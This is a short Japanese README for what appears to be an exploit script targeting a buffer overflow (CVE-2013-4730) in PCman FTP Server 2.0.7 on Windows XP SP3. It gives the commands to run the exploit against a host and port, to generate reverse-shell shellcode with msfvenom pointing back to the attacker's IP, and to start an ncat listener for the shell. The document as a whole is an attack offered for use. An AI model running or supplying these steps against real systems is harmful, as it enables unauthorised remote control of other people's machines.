
CVE-2013-4730を使用した、PCmanのFTPサーバーに対する非常にシンプルなバッファオーバーフロー。
PCman の FTP サーバ v.2.0.7 に対する CVE-2013-4730 を使った非常にシンプルなバッファオーバーフローです。
この簡単な BoF がバッファを上書きし、接続し直す(リバースシェル)シェルコードを実行します。
WindowsXP SP3 で PCman の FTP サーバ バージョン 2.0.7 を実行中
~$ python3 PCman.py <host> <port>
~$ sudo ./msfvenom windows/shell_reverse_tcp LHOST=<your ip> LPORT=4444
~$ ncat -lvp <shellcode port>